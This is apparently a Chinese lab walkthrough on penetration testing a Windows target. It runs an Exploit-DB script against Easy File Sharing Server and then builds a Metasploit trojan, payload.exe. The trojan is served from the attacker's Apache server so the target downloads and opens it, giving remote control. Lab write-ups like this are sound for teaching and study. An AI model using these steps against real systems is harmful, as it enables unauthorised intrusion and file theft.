一、漏洞渗透测试
1、靶机(Windows)安装easy file sharing server,该服务存在漏洞。
2、利用Nmap扫描发现靶机(Windows)运行了该服务。
3、利用该漏洞,使得靶机运行计算器。
一、打开easy file sharing server

二、kali上nmap扫描端口

发现80和443端口提供该服务
扫描漏洞

运行脚本
python2 /usr/share/exploitdb/exploits/windows/remote/39009.py 靶机ip 80

之后靶机会启动计算器,easy file sharing server 关闭,漏洞复现成功。
二、Metasploit应用
1、生成主控端、被控端。
2、获得靶机(Windows)控制权。
3、下载靶机上任意一个文件。
一、生成被控端
生成一个木马文件

启动apache服务,使得靶机能够下载木马文件
service apache2 start
将木马文件上传到服务器上
cp payload.exe /var/www/html/payload.exe

之后靶机要下载该文件
浏览器输入攻击机ip/payload.exe

打开msfconsole
设置参数

之后只要靶机打开了木马文件,就可以控制靶机了

如图就已经控制成功了
我们可以查看靶机的文件

如果不再控制靶机,输入

如果不再要控制靶机,输入
exit -y
即可退出控制